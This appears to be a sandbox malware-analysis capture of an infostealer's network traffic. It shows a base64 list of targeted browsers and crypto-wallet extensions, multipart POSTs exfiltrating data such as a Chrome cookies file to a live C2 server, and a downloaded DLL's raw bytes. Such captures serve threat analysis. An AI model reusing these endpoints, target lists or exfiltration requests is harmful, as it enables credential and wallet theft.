                                                                                                                                                                                                                                                                                      Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:01.538228989 CEST427INData Raw: 32 31 6c 66 47 4a 79 62 33 64 7a 5a 58 49 75 5a 58 68 6c 66 45 39 77 5a 58 4a 68 49 46 4e 30 59 57 4a 73 5a 58 78 63 54 33 42 6c 63 6d 45 67 55 32 39 6d 64 48 64 68 63 6d 56 38 62 33 42 6c 63 6d 46 38 62 33 42 6c 63 6d 45 75 5a 58 68 6c 66 45 39
                                                                                                                                                                                                                                                                                      Data Ascii: 21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRmlyZWZveHxcTW96aWxsYVxGaXJlZm94XFByb2ZpbGVzfGZpcmVmb3h8MHxQYWxlIE1vb258XE1vb25jaGlsZCBQ
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:01.539793015 CEST468OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----BKECAEBGHDAEBFHIEGHI
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Content-Length: 267
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 43 41 45 42 47 48 44 41 45 42 46 48 49 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 33 34 63 33 36 32 66 32 33 34 35 62 33 38 61 65 34 33 34 38 38 61 65 63 30 36 61 63 64 31 65 35 65 39 39 32 31 65 30 38 38 63 63 39 30 36 33 31 35 39 35 30 65 32 37 32 39 36 35 37 61 64 36 37 37 35 62 66 66 39 39 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 41 45 42 47 48 44 41 45 42 46 48 49 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 41 45 42 47 48 44 41 45 42 46 48 49 45 47 48 49 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: ------BKECAEBGHDAEBFHIEGHIContent-Disposition: form-data; name="token"934c362f2345b38ae43488aec06acd1e5e9921e088cc906315950e2729657ad6775bff99------BKECAEBGHDAEBFHIEGHIContent-Disposition: form-data; name="message"plugins------BKECAEBGHDAEBFHIEGHI--
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:01.851963997 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:01 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 5416
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d 5a 75 59 6d 56 73 5a 6d 52 76 5a 57 6c 76 61 47 56 75 61 32 70 70 59 6d 35 74 59 57 52 71 61 57 56 6f 61 6d 68 68 61 6d 4a 38 4d 58 77 77 66 44 42 38 51 32 39 70 62 6d 4a 68 63 32 55 67 56 32 46 73 62 47 56 30 49 47 56 34 64 47 56 75 63 32 6c 76 62 6e 78 6f 62 6d 5a 68 62 6d 74 75 62 32 4e 6d 5a 57 39 6d 59 6d 52 6b 5a 32 4e 70 61 6d 35 74 61 47 35 6d 62 6d 74 6b 62 6d 46 68 5a 48 77 78 66 44 42 38 4d 58 78 48 64 57 46 79 5a 47 46 38 61 48 42 6e 62 47 5a 6f 5a 32 5a 75 61 47 4a 6e 63 47 70 6b 5a 57 35 71 5a 32 31 6b 5a 32 39 6c 61 57 46 77 63 47 46 6d 62 47 35 38 4d 58 77 77 66 44 42 38 53 6d 46 34 65 43 42 4d 61 57 4a 6c 63 6e 52 35 66 47 4e 71 5a 57 78 6d 63 47 78 77 62 47 56 69 5a 47 70 71 5a 57 35 73 62 48 42 71 59 32 4a 73 62 57 70 72 5a 6d 4e 6d 5a 6d 35 6c 66 44 46 38 4d 48 77 77 66 47 6c 58 59 57 78 73 5a 58 52 38 61 32 35 6a 59 32 68 6b 61 57 64 76 59 6d 64 6f 5a 57 35 69 59 6d 46 6b 5a 47 39 71 61 6d 35 75 59 57 39 6e 5a 6e 42 77 5a 6d 70 38 4d 58 77 77 66 44 42 38 54 55 56 58 49 45 4e 59 66 47 35 73 59 6d 31 75 62 6d 6c 71 59 32 35 73 5a 57 64 72 61 6d 70 77 59 32 5a 71 59 32 78 74 59 32 5a 6e 5a 32 5a 6c 5a 6d 52 74 66 44 46 38 4d 48 77 77 66 45 64 31 61 57 78 6b 56 32 46 73 62 47 56 30 66 47 35 68 62 6d 70 74 5a 47 74 75 61 47 74 70 62 6d 6c 6d 62 6d 74 6e 5a 47 4e 6e 5a 32 4e 6d 62 6d 68 6b 59 57 46 74 62 57 31 71 66 44 46 38 4d 48 77 77 66 46 4a 76 62 6d 6c 75 49 46 64 68 62 47 78 6c 64 48 78 6d 62 6d 70 6f 62 57 74 6f 61 47 31 72 59 6d 70 72 61 32 46 69 62 6d 52 6a 62 6d 35 76 5a 32 46 6e 62 32 64 69 62 6d 56 6c 59 33 77 78 66 44 42 38 4d 48 78 4f 5a 57 39 4d 61 57 35 6c 66 47 4e 77 61 47 68 73 5a 32 31 6e 59 57 31 6c 62 32 52 75 61 47 74 71 5a 47 31 72 63 47 46 75 62 47 56 73 62 6d 78 76 61 47 46 76 66 44 46 38 4d 48 77 77 66 45 4e 4d 56 69 42 58 59 57 78 73 5a 58 52 38 62 6d 68 75 61 32 4a 72 5a 32 70 70 61 32 64 6a 61 57 64 68 5a 47 39 74 61 33 42 6f 59 57 78 68 62 6d 35 6b 59 32 46 77 61 6d 74 38 4d 58 77 77 66 44 42 38 54 47 6c 78 64 57 46 73 61 58 52 35 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 64 68 62
                                                                                                                                                                                                                                                                                      Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhb
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:01.852024078 CEST1289INData Raw: 47 78 6c 64 48 78 68 61 57 6c 6d 59 6d 35 69 5a 6d 39 69 63 47 31 6c 5a 57 74 70 63 47 68 6c 5a 57 6c 71 61 57 31 6b 63 47 35 73 63 47 64 77 63 48 77 78 66 44 42 38 4d 48 78 4c 5a 58 42 73 63 6e 78 6b 62 57 74 68 62 57 4e 72 62 6d 39 6e 61 32 64
                                                                                                                                                                                                                                                                                      Data Ascii: GxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBk
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:01.852061987 CEST1289INData Raw: 46 73 62 47 56 30 66 47 4a 6f 61 47 68 73 59 6d 56 77 5a 47 74 69 59 58 42 68 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 77 77 66 45 4e 35 59 57 35 76 49 46 64 68 62 47 78 6c 64 48 78 6b 61 32 52 6c
                                                                                                                                                                                                                                                                                      Data Ascii: FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8M
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:01.852129936 CEST1289INData Raw: 77 59 6d 64 6a 61 6d 56 77 62 6d 68 70 59 6d 78 68 61 57 4a 6a 62 6d 4e 73 5a 32 74 38 4d 58 77 77 66 44 42 38 52 6d 6c 75 62 6d 6c 6c 66 47 4e 71 62 57 74 75 5a 47 70 6f 62 6d 46 6e 59 32 5a 69 63 47 6c 6c 62 57 35 72 5a 48 42 76 62 57 4e 6a 62
                                                                                                                                                                                                                                                                                      Data Ascii: wYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY2
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:01.852168083 CEST456INData Raw: 59 6d 56 72 59 32 4e 70 62 6d 68 68 63 47 52 69 66 44 46 38 4d 48 77 77 66 45 39 77 5a 58 4a 68 49 46 64 68 62 47 78 6c 64 48 78 6e 62 32 70 6f 59 32 52 6e 59 33 42 69 63 47 5a 70 5a 32 4e 68 5a 57 70 77 5a 6d 68 6d 5a 57 64 6c 61 32 52 6e 61 57
                                                                                                                                                                                                                                                                                      Data Ascii: YmVrY2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHx
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:01.875792980 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----DAAAKFHIEGDGCAAAEGDG
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Content-Length: 6871
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:01.875838041 CEST6871OUTData Raw: 2d 2d 2d 2d 2d 2d 44 41 41 41 4b 46 48 49 45 47 44 47 43 41 41 41 45 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 33 34 63 33 36
                                                                                                                                                                                                                                                                                      Data Ascii: ------DAAAKFHIEGDGCAAAEGDGContent-Disposition: form-data; name="token"934c362f2345b38ae43488aec06acd1e5e9921e088cc906315950e2729657ad6775bff99------DAAAKFHIEGDGCAAAEGDGContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:02.204765081 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:02 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:02.205513954 CEST93OUTGET /15f649199f40275b/sqlite3.dll HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:02.509706974 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:02 GMT
                                                                                                                                                                                                                                                                                      Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                      Content-Length: 1106998
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT
                                                                                                                                                                                                                                                                                      ETag: "10e436-5e7ec6832a180"
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00 2e 00 00 00 14 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 37 00 00 00 00 00 5c 0b 00 00 00 c0 0e 00 00 0c 00 00 00 42 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 37 30 00 00 00 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: *0@< .text%&`P`.data|'@(,@`.rdatapDpFT@`@.bss(`.edata*,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70#N
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:02.509747028 CEST1289INData Raw: 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 50 03 00 00 00 20 0f 00 00 04 00 00 00 8e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00
                                                                                                                                                                                                                                                                                      Data Ascii: @B/81s:<R@B/92P @B
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:02.509809017 CEST1289INData Raw: 00 00 00 e8 2b e9 0a 00 8d 43 ff 89 7c 24 08 89 5c 24 04 89 34 24 83 f8 01 77 8c e8 23 fd ff ff 83 ec 0c 85 c0 74 bf 89 7c 24 08 89 5c 24 04 89 34 24 e8 ac f6 0a 00 83 ec 0c 85 c0 89 c5 75 23 83 fb 01 75 a1 89 7c 24 08 c7 44 24 04 00 00 00 00 89
                                                                                                                                                                                                                                                                                      Data Ascii: +C|$\$4$w#t|$\$4$u#u|$D$4$t&up|$D$4$rZ|$D$4$Q|$D$4$*|$D$4$s|$D$4$
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:02.509849072 CEST1289INData Raw: 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 03 8b 42 10 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 11 8b 4a 10 85 c9 74 0a 8b 42 04 c6 04 08 00 8b 42 04 5d c3 8b 10 8d 4a 01 89 08 0f b6 12 81 fa bf 00 00 00 76 59 55 0f b6 92 40 9e ec 61 89 e5 53 8b 18 8a
                                                                                                                                                                                                                                                                                      Data Ascii: ]U1UtB]U1UtJtBB]JvYU@aSuK?v"%=t=D[]USI1t9sAvuA@[] gatU$1U
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:02.509887934 CEST1289INData Raw: 02 c1 e3 07 09 cb 89 1a e9 4c 01 00 00 0f b6 70 02 0f b6 db c1 e3 0e 09 f3 f6 c3 80 75 1e 83 e1 7f 81 e3 7f c0 1f 00 c7 42 04 00 00 00 00 c1 e1 07 b0 03 09 cb 89 1a e9 1d 01 00 00 0f b6 70 03 0f b6 c9 81 e3 7f c0 1f 00 c1 e1 0e 09 f1 f6 c1 80 75
                                                                                                                                                                                                                                                                                      Data Ascii: LpuBpuBxMMuMZ2Mx]uZxu
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:05.259397030 CEST952OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----DAECAECFCAAEBFHIEHDG
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Content-Length: 751
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 2d 2d 2d 2d 2d 2d 44 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 33 34 63 33 36 32 66 32 33 34 35 62 33 38 61 65 34 33 34 38 38 61 65 63 30 36 61 63 64 31 65 35 65 39 39 32 31 65 30 38 38 63 63 39 30 36 33 31 35 39 35 30 65 32 37 32 39 36 35 37 61 64 36 37 37 35 62 66 66 39 39 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 54 30 